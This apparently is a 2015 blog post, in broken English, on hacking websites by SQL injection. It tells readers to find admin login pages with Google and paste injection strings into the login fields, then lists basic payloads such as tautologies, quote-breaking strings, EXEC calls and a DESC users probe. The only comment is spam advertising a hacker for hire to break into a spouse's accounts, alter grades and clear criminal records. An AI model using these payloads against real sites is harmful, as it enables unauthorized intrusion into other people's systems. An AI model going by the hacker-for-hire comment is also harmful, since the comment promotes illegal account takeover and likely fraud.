More

Tuesday, 10 March 2015

website hack by sql injection

It is sql onjection it help to hack website.first we find admin page from google help.like-
we will past sql inj. in id and password

Normal SQL Injection:         1 OR 1=1

Normal SQL Injection using encapsulated data:
    1' OR '1'='1

Blind SQL Injection to throw an error to validate that encapsulation isn't working. The goal here is to throw an error to cause the application to show us that it is not encapsulating quotes correctly:
                             1'1

Blind SQL Injection creating an error using EXEC:
     1 EXEC SP_ (or EXEC XP_)



Blind SQL Injection detection (this shouldn't give us the same result if filtering is in place as we would get if we excluded the AND 1 = 1 part. If it does give us the same result it shows that the application is vulnerable):

1 AND 1=1

\'; DESC users; --


1\'1

1 comment:

  1. Do you need to increase your credit score?
    Do you intend to upgrade your school grade?
    Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
    Do you need any information concerning any database.
    Do you need to retrieve deleted files?
    Do you need to clear your criminal records or DMV?
    Do you want to remove any site or link from any blog?
    you should contact this hacker, he is reliable and good at the hack jobs..
    contact : cybergoldenhacker at gmail dot com

    ReplyDelete